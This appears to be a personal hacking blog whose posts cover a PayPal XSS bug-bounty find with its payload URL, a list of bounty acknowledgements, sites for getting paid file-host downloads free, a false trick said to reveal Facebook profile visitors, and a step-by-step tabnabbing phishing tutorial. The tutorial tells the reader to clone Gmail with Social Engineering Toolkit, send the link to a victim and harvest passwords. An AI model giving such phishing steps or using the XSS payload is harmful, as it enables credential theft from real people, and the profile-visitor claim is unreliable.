Friday, April 17, 2015

XSS Bug on Paypal.com

1 comments
Hello Leets,

Today i am writing about my finding on Paypal.com

That's a XSS ( Cross Site Scripting )......

The Story began at the 31st December 2014 when all people's are enjoying the new year celebration and i was engaged in finding security bugs...

Then i was try to hunting a paypal site...

After lots of try i found a pattern to inject my code to execute the XSS bug..


So the Vulnerable perameter is   
q = 

Vulnerable link:
===========


https://www.paypal.com/directory/merchants?q=directory/merchants?q=&q=q=directory/merchants?q=&q=%22%3E%3Cimg%20src=x%20onerror=prompt%28document.domain%29%3E


Poc:
=====



Video Demo:
==========





The bug is fixed Now and paypal pays me a bounty of  750$...

Thanks Paypal team....

Saturday, June 14, 2014

Listed And Acknowledge As White Hat Hacker

0 comments

Hall Of Fame in SONY

https://secure.sony.net/hallofthanks




Hall Of Fame in ORACLE

http://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/2368792.xml




Hall Of Fame in APPLE INC

https://support.apple.com/en-us/HT201536




Hall Of Fame & Wall of fame TOP 10 Security Researchers
+Bounty

https://www.paypal.com/webapps/mpp/security-tools/wall-of-fame-honorable-mention

https://www.paypal.com/us/webapps/mpp/security-tools/wall-of-fame






Acknowledge by ESET




Hall Of Fame In Informatica

https://hackerone.com/informatica/thanks




Hall Of Fame In 123contactform.com

http://www.123contactform.com/security-acknowledgements.htm



Hall Of Fame In Lookout

https://hackerone.com/lookout/thanks




Hall Of Fame In INTUIT
https://security.intuit.com/acknowledgements.html



Hall of Fame In BlackBerry Inc.

http://us.blackberry.com/enterprise/products/incident-response-team.html



Acknowledge With Digital Certificate by Mediafire




Hall Of Fame In MadWhips

http://www.madwhips.com/credits



Hall Of Fame In C2FO

https://hackerone.com/c2fo/thanks



Hall Of Fame In HowAboutWe

https://hackerone.com/howaboutwe/thanks




Hall Of Fame In MadWhips.com

http://www.madwhips.com/credits



Hall Of Fame In Compose.io

https://www.compose.io/security/




Reward : Swag From Pagerduty for Finding A Bug In Their
Website...





Hall Of Fame In Siteground

https://www.siteground.com/term/92.htm





Hall Of Fame In Unitag.io

https://www.unitag.io/security



Hall Of Fame In ENVATO

http://webuild.envato.com/helpful-hacker




Digital Cerificates From 
U.S.Department Of Homeland Security






Hall Of Fame In Twitter

https://hackerone.com/twitter/thanks




Hall Of Fame In Appcelerator

http://www.appcelerator.com/privacy/responsible-disclosure-of-security-vulnerabilities/





Hall Of Fame In ExpressionEngine

https://hackerone.com/expressionengine/thanks





Hall Of Fame In ADOBE

helpx.adobe.com/security/acknowledgements.html



Digital Certificate From : LAVASOFT




Hall Of Fame In BarracudaLabs

https://barracudalabs.com/research-resources/bug-bounty-program/bug-bounty-hall-of-fame-2/




Hall Of Fame In JSDELIVR

https://hackerone.com/jsdelivr/thanks





Hall Of Fame In MAGIX AG

http://research.magix.com/




Hall Of Fame In Bitcasa

https://support.bitcasa.com/hc/en-us/articles/202210658-How-To-Responsibly-Report-Security-Concerns





Hall of Fame In AT&T Bug Bounty

https://bugbounty.att.com/hof.php




Hall Of Fame In Wepay.com

https://hackerone.com/wepay/thanks




Hall Of Fame In Factlink.com 

https://hackerone.com/factlink/thanks



Hall Of Fame In Hotgloo Security Response 

http://www.hotgloo.com/security/security-response





Badge Of Honor Digital Certificate From :  Moment.me


Tuesday, October 1, 2013

Premium Link Generator Websites List

0 comments

1. Generator Link Premium:



Generator Link Premium is my favorite generator website. It allows us to download files of any size from Extabit and most other storage centers for free. You can even use IDM to download your extabit files. There is also no limit on file size and number of files. Try this one first and if you have problems with this one, try the next one!



2. Unrestrict:




Unrestrict.li is another website in this section. It provides same benefits as the first one. But, it requires the user to register for an account in-order to get the premium benefits. So, I have kept it at second position.


3. Tigerleech:





Tigerleech provides premium links for Extabit files. Even this website requires the user to register for an account in-order to get premium links. Also, for free users, the speed is limited to 120 KB/s, though this speed is pretty suitable for most users. Hence, Tigerleech occupies 3rd spot in the list.


4. Rapid8:



Rapid8 is one of the oldest websites providing premium links for netizens. When it comes to extabit, Rapid8 allows free users to generate premium links for files below 500MB size. If you have file of size less than 500 MB, use Rapid8 to download extabit files with ease.


I hope now you can use one of the above extabit premium account generator websites to get extabit premium benefits. Most of these links work for other file storage websites too. Henceforth, you don’t have to wait for downloads or purchase any premium account. Simply use these links and they will do the job for you. Cheers!

Sunday, September 22, 2013

How To Find Your Facebook Profile Visitors

1 comments
Now here we found who recently visited your profile. Follow below steps for get to know your FB recent visitors.

Step 1) Go to your Facebook Profile Page.

Step 2) Now Press Ctrl + U from your keyboard for see source code of your profile page.

Step 3) Now press Ctrl + F from your keyboard to open search box.

Step 4) Now search this code {"list":

Step 5) You find some Facebook Profile Ids are like shown below. Click on example image for zoom.


Step 6) There are some Facebook Profile Ids of your friends who visited recently.

Step 7) The first one ID's are showing visits the most number of time. 

Step 8) Now if your want to findout, Open a new tab Enter below link :

graph.facebook.com/Facebook Profile Id

For Example : www.facebook.com/100005817068623


Friday, September 13, 2013

How to Hack Gmail, Facebook with Using Tab Nabbing

0 comments

THIS IS THE LATEST TECHNIQUE OF PHISHING ATTACK.

ATTACKER OS : KALI LINUX

VICTIMS OS : WINDOWS



START SOCIAL ENGINEERING TOOLKIT.



SELECT OPTION  => SOCIAL ENGINEERING ATTACKS


SELECT OPTION 2=> WEBSITE ATTACK VECTORS


SELECT OPTION 4=> TABNABBING ATTACK METHOD


SELECT OPTION 2=> SITE CLONER


TYPE UR IP ADDRESS AND THE SITE U WANNA CLONE.
MY IP IS 192.168.152.132

AND I LIKE TO CLONE GMAIL WHILE THIS ATTACK.


NOW THE LISTENER IS START AND PROVIDE UR IP  TO UR VICTIM VIA CHAT OR ANOTHER OPTION AND U ALSO USE SHORTERN LINK TO HIDE THIS LINK.


UR VICTIM IS TRYING TO OPEN THIS LINK BUT HE/SHE WILL SHE THE PAGE IS LOADING SO THEY OPEN ANOTHER TAB AND THE ATTACK GONNA WILD.
THE SCRIPT TURNED THE NEW TAB TO UR PHISH PAGE.


AND NOW U GOT THE USER AND PASSWORD OF UR VICTIM.